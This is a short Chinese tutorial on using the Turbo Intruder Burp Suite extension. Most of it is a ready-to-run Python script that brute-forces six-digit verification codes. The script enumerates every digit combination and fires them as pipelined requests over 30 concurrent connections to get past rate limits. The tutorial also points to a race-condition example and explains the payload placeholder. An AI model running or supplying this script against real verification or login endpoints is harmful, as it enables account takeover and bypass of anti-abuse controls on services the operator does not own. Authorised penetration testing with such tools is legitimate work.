TurboIntruder使用-burp插件

参考文章:burpsuit插件Turbo Intruder:突破速率限制详解 - 渗透测试中心 - 博客园

0.1.1. 一、打开扩展

抓到包点击

0.1.2. 二、基本用法

0.1.3. 三、常用脚本

0.1.3.1. 验证码爆破
from itertools import product

def brute_veify_code(target, engine, length):

   pattern = '1234567890'    #用于生成字典的迭代对像

   for i in list(product(pattern, repeat=length)):    #product()接收多个迭代对像,然后生成一个笛卡尔积,repeat参数代表重复迭代对象次数。

        code =  ''.join(i)

        engine.queue(target.req, code)


def queueRequests(target, wordlists):

   engine = RequestEngine(endpoint=target.endpoint,        #指定目标的地址

           concurrentConnections=30,    #与服务器建立30条连接

           requestsPerConnection=100,    #每条连接同时发送100个请求

           pipeline=True    #开启管道(HTTP Pipelining)模式

           )

   brute_veify_code(target, engine, 6)  #根据验证码位数修改


def handleResponse(req, interesting):


 if 'error' not in req.response:    #对response进行操作,不含有“error”的添加入表中

      table.add(req)
0.1.3.2. 并发

选择/examples/race.py

0.1.4. 四、注意点

启动攻击会检测是否有%s
如果不需要则可以请求头随便加一个
X: %s